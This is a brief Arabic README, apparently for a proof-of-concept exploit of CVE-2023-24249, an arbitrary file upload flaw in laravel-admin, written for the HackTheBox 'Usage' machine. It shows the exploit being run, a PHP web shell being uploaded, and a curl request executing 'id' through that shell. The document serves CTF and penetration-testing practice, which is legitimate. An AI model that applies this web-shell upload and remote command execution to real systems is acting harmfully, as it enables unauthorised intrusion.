
استغلال إثبات مفهوم لـ CVE-2023-24249، ثغرة رفع ملفات عشوائية في laravel-admin، مما يتيح نشر قشرة ويب لاختبار الاختراق وتحديات CTF.
CVE-2023-24249 هي ثغرة تحميل ملفات عشوائية في laravel-admin v1.8.19. يستغل هذا المفهوم التجريبي الثغرة لتحميل غلاف ويب.
تم كتابة الاستغلال لاستخدامه ضد جهاز HackTheBox السهل Usage.
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php
curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id
uid=1000(dash) gid=1000(dash) groups=1000(dash)